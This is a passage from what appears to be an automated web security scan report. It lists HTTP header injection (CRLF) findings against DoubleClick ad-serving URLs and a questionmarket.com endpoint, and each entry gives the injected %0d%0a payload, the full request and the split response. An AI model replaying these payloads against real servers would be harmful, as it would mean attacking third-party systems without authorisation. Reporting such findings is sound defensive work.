Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b8f1
4fde4d2ea46
/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http: //ad.yieldmanager.com/clk
Date: Mon, 14 Feb 2011 01:38:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4dc34%0d%0aa5e50b6234 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4dc34%0d%0aa5e50b6234/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4dc34
a5e50b6234
/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http: //media.fastclick.net/w/click.here
Date: Mon, 14 Feb 2011 01:44:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 21598%0d%0adfea6d161cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /21598%0d%0adfea6d161cc/N5506.aol1/B5070033.19;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494%5E961998%5E65%5E0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64?trg=;ord=4634560753? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/21598
dfea6d161cc
/N5506.aol1/B5070033.19;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494^961998^65^0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64
Date: Mon, 14 Feb 2011 01:26:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f51e%0d%0a50897e369b1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f51e%0d%0a50897e369b1/N5506.aol1/B5070033.20;sz=468x60;click=http://r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416%5E955496%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64?trg=;ord=5663037085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f51e
50897e369b1
/N5506.aol1/B5070033.20;sz=468x60;click=http: //r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416^955496^1183^0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64
Date: Mon, 14 Feb 2011 01:37:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4200e%0d%0a6f9caf0b583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4200e%0d%0a6f9caf0b583/N5506.aol1/B5070033.21;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492%5E955494%5E65%5E0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64?trg=;ord=6836118676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4200e
6f9caf0b583
/N5506.aol1/B5070033.21;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492^955494^65^0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64
Date: Mon, 14 Feb 2011 01:40:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B3792881.193

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d0ee%0d%0a9315563214f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d0ee%0d%0a9315563214f/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=60387657634239681&mt_id=102306&mt_adid=53&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60387657634239681? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d0ee
9315563214f
/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http: //pixel.mathtag.com/click/img
Date: Mon, 14 Feb 2011 02:14:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6046.134363.2043285697521/B5118749.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69142%0d%0a1bb7359b8ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69142%0d%0a1bb7359b8ec/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http://r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606%5E947584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64?trg=;ord=5635760168? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69142
1bb7359b8ec
/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http: //r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606^947584^1183^0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64
Date: Mon, 14 Feb 2011 01:52:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6092.AOL/B5108587.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9b799%0d%0abb53a367fe4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9b799%0d%0abb53a367fe4/N6092.AOL/B5108587.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505%5E969227%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64?trg=;ord=4637776738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9b799
bb53a367fe4
/N6092.AOL/B5108587.3;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505^969227^1183^0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64
Date: Mon, 14 Feb 2011 01:41:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e2dd%0d%0aaa7cb3ecbf6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e2dd%0d%0aaa7cb3ecbf6/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ag1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;cmw=owl;sz=300x250;net=cm;ord1=789918;contx=polit;an=300;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.health_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ag1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=$cacheBuster$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e2dd
aa7cb3ecbf6
/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af:
Date: Mon, 14 Feb 2011 02:10:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/drudgereport.ilm/remnant

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 697e6%0d%0a706ed09c5de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /697e6%0d%0a706ed09c5de/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff901.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/697e6
706ed09c5de
/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord=:
Date: Mon, 14 Feb 2011 01:52:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pmv.inm.ind/news_home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93ccd%0d%0a389a982e7d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93ccd%0d%0a389a982e7d5/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http%3A//adserver.adtech.de/adlink%7C979%7C2440402%7C0%7C529%7CAdId%3D2789559%3BBnId%3D3%3Bitime%3D647360380%3Bkey%3Dworafr%3Blink%3D;ord=647360380? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93ccd
389a982e7d5
/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http: //adserver.adtech.de/adlink|979|2440402|0|529|AdId=2789559;BnId=3;itime=647360380;key=worafr;link=;ord=647360380
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/resn.173878/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8c4%0d%0a0177437432c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1c8c4%0d%0a0177437432c/resn.173878/;alias=epcv0111a;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D893172%3Bx%3D2333%3Bg%3D172%3Bc%3D794000529%2C794000529%3Bi%3D0%3Bn%3D794%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D5%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.7725227591581643%3Bk%3D;ord=0.7283410648815334? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1c8c4
0177437432c
/resn.173878/;alias=epcv0111a;sz=300x250;click=http: //yads.zedo.com/ads2/c
Date: Mon, 14 Feb 2011 01:37:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60afd%0d%0a8f5fec5b5f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60afd%0d%0a8f5fec5b5f5/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60afd
8f5fec5b5f5
/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264:
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c397%0d%0a667e0f07fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c397%0d%0a667e0f07fb/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c397
667e0f07fb
/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=40727:
Date: Mon, 14 Feb 2011 01:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53d32%0d%0a19fe23f2faf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53d32%0d%0a19fe23f2faf/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53d32
19fe23f2faf
/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=40727614:
Date: Mon, 14 Feb 2011 01:38:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 51fdf%0d%0aa355c11c9ff was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

